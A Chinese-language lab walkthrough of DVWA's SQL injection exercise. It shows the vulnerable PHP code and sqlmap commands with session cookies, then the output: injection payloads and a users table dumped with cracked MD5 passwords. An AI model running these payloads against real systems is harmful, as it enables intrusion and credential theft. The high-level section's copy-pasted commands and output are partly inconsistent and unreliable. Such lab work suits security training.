DVWA SQL Injection实验
使用SQLMAP完成DVWA SQL注入实验
正常功能
完成输入查看id对应的用户名
判断SQL注入的类型方法
判断SQL注入是数字型还是字符型
数字型
$id = $_GET['content'];
select * from users where id=1字符型
$id = $_GET['content'];
select * from users where id='admin'Low难度
代码分析
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
// Get input
$id = $_REQUEST[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>上述代码未对输入进行过滤,我们输入的内容会传给$id,因此可以考虑在输入上做文章
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';查看注入点
由于dvwa默认存在用户名和密码登录的情况,因此这里需要使用--cookie来获取登陆状态,然后在进行扫描,尝试注入漏洞
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=pimuhjh6udoe422658b7dl0g37"可以看到相关的注入情况如下
sqlmap identified the following injection point(s) with a total of 150 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: id=2' OR NOT 4391=4391#&Submit=Submit
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=2' AND GTID_SUBSET(CONCAT(0x717a6a7171,(SELECT (ELT(8715=8715,1))),0x716a6a7871),8715)-- ZTFh&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=2' AND (SELECT 7666 FROM (SELECT(SLEEP(5)))rSxl)-- MbUf&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=2' UNION ALL SELECT NULL,CONCAT(0x717a6a7171,0x6359625a4c596e436c4e65415a5869486d727048546d4748475467474b7355467a4b4f4946556979,0x716a6a7871)#&Submit=Submit查询数据库
查询数据库都有哪些
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --dbs发现相关的数据库如下
[11:28:06] [INFO] fetching database names
[11:28:06] [WARNING] reflective value(s) found and filtering out
available databases [3]:
[*] dvwa
[*] information_schema
[*] test查看数据表
查看数据库dvwa下的表名
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=pimuhjh6udoe422658b7dl0g37" -D dvwa --tables可以看到guestbook、users两张表
[11:43:31] [INFO] fetching tables for database: 'dvwa'
[11:43:31] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+查看数据表的列
查看user数据表下的列
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=pimuhjh6udoe422658b7dl0g37" -D dvwa -T users --columns可以看到每列的字段名称以及对应的数据类型
[13:37:44] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| user | varchar(15) |
| avatar | varchar(70) |
| failed_login | int(3) |
| first_name | varchar(15) |
| last_login | timestamp |
| last_name | varchar(15) |
| password | varchar(32) |
| user_id | int(6) |
+--------------+-------------+查看数据表中某个字段的具体值
查看dvwa数据库下users表中username、password字段值
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=pimuhjh6udoe422658b7dl0g37" -D dvwa -T users --columns user,password -dump可以自动解出简单的md5值,用这种方法很方便就能找到用户密码,就不需要在线md5解密了
do you want to use common password suffixes? (slow!) [y/N]
[13:47:22] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[13:47:22] [INFO] starting 8 processes
[13:47:23] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[13:47:24] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[13:47:26] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
[13:47:27] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
Database: dvwa
Table: users
[5 entries]
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | user | avatar | password | last_name | first_name | last_login | failed_login |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1 | admin | /dvwa/hackable/users/admin.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | 2021-03-30 11:26:47 | 0 |
| 2 | gordonb | /dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | 2021-03-30 11:26:47 | 0 |
| 3 | 1337 | /dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | 2021-03-30 11:26:47 | 0 |
| 4 | pablo | /dvwa/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | 2021-03-30 11:26:47 | 0 |
| 5 | smithy | /dvwa/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | 2021-03-30 11:26:47 | 0 |
+---------+---------+----------------------------------+---------------------------------------------Medium难度
代码分析
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Display values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?>上述代码使用mysql_real_escape_string函数对输入的特殊字符进行了转义,同时在前端页面使用了下拉列表,将之前的get请求更改为post请求
实验过程
查看注入点
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit"可以发现存在不同类型的注入点
[17:12:26] [INFO] POST parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests:
---
Parameter: id (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (8328=8328) THEN 2 ELSE (SELECT 4432 UNION SELECT 9630) END))&Submit=Submit
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=2 AND GTID_SUBSET(CONCAT(0x717a6a7171,(SELECT (ELT(1202=1202,1))),0x716a6a7871),1202)&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=2 AND (SELECT 2862 FROM (SELECT(SLEEP(5)))gLnf)&Submit=Submit
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=2 UNION ALL SELECT CONCAT(0x717a6a7171,0x55506e6a56597642546f5571454645716847774e5158616e557766706342496b4a7a676f45486173,0x716a6a7871),NULL-- -&Submit=Submit
---查看数据库
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" -dbs可以看到爆出的数据库有dvwa、information_schema、test
[17:14:43] [INFO] fetching database names
available databases [3]:
[*] dvwa
[*] information_schema
[*] test查看数据表
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --tables -D "dvwa"可以看到爆出的数据表guestbook、users
[17:24:40] [INFO] fetching tables for database: 'dvwa'
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+查看数据表的列
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --columns -D "dvwa" -T "users"可以看到users表中的列
[17:34:08] [INFO] fetching columns for table 'users' in database 'dvwa'
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| user | varchar(15) |
| avatar | varchar(70) |
| failed_login | int(3) |
| first_name | varchar(15) |
| last_login | timestamp |
| last_name | varchar(15) |
| password | varchar(32) |
| user_id | int(6) |
+--------------+-------------+查看数据表中某个字段的具体值
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --columns -D "dvwa" -T "users" user,password -dump查看表中user和password的值
[17:35:25] [INFO] fetching columns for table 'users' in database 'dvwa'
[17:35:25] [INFO] fetching entries for table 'users' in database 'dvwa'
[17:35:25] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] \
do you want to crack them via a dictionary-based attack? [Y/n/q]
[17:35:29] [INFO] using hash method 'md5_generic_passwd'
[17:35:29] [INFO] resuming password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[17:35:29] [INFO] resuming password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[17:35:29] [INFO] resuming password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[17:35:29] [INFO] resuming password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
Database: dvwa
Table: users
[5 entries]
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | user | avatar | password | last_name | first_name | last_login | failed_login |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1 | admin | /dvwa/hackable/users/admin.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | 2021-03-30 11:26:47 | 0 |
| 2 | gordonb | /dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | 2021-03-30 11:26:47 | 0 |
| 3 | 1337 | /dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | 2021-03-30 11:26:47 | 0 |
| 4 | pablo | /dvwa/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | 2021-03-30 11:26:47 | 0 |
| 5 | smithy | /dvwa/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | 2021-03-30 11:26:47 | 0 |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+High难度
代码分析
<?php
if( isset( $_SESSION [ 'id' ] ) ) {
// Get input
$id = $_SESSION[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>High难度的页面变成了单独的session-input.php入口提交内容,然后再传到原来的页面,可以一定程度上防止一般的sqlmap注入,不过sqlmap还是很强大的,可以通过提升level来解决这个问题。
查看注入点
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --level=2可以发现存在不同类型的注入点
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (8328=8328) THEN 2 ELSE (SELECT 4432 UNION SELECT 9630) END))&Submit=Submit
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=2 AND GTID_SUBSET(CONCAT(0x717a6a7171,(SELECT (ELT(1202=1202,1))),0x716a6a7871),1202)&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=2 AND (SELECT 2862 FROM (SELECT(SLEEP(5)))gLnf)&Submit=Submit
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=2 UNION ALL SELECT CONCAT(0x717a6a7171,0x55506e6a56597642546f5571454645716847774e5158616e557766706342496b4a7a676f45486173,0x716a6a7871),NULL-- -&Submit=Submit
---
查看数据库
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" -dbs可以看到爆出的数据库有dvwa、information_schema、test
[17:14:43] [INFO] fetching database names
available databases [3]:
[*] dvwa
[*] information_schema
[*] test查看数据表
http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --level=2 -dbs可以看到爆出的数据表guestbook、users
[21:50:18] [INFO] fetching database names
available databases [3]:
[*] dvwa
[*] information_schema
[*] test查看数据表的列
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --columns -D "dvwa" -T "users" --level=2可以看到users表中的列
[21:51:52] [INFO] fetching columns for table 'users' in database 'dvwa'
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| user | varchar(15) |
| avatar | varchar(70) |
| failed_login | int(3) |
| first_name | varchar(15) |
| last_login | timestamp |
| last_name | varchar(15) |
| password | varchar(32) |
| user_id | int(6) |
+--------------+-------------+查看数据表中某个字段的具体值
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --columns -D "dvwa" -T "users" user,password -dump --level=2查看表中user和password的值
Database: dvwa
Table: users
[5 entries]
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | user | avatar | password | last_name | first_name | last_login | failed_login |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1 | admin | /dvwa/hackable/users/admin.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | 2021-03-30 11:26:47 | 0 |
| 2 | gordonb | /dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | 2021-03-30 11:26:47 | 0 |
| 3 | 1337 | /dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | 2021-03-30 11:26:47 | 0 |
| 4 | pablo | /dvwa/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | 2021-03-30 11:26:47 | 0 |
| 5 | smithy | /dvwa/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | 2021-03-30 11:26:47 | 0 |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+Impossible难度
代码分析
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
// Check the database
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();
$row = $data->fetch();
// Make sure only 1 result is returned
if( $data->rowCount() == 1 ) {
// Get values
$first = $row[ 'first_name' ];
$last = $row[ 'last_name' ];
// Feedback for end user
$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>上述代码继续延续PDO技术,同时采用user-token验证的方式,防止CSRF攻击。
© 版权声明
THE END
暂无评论内容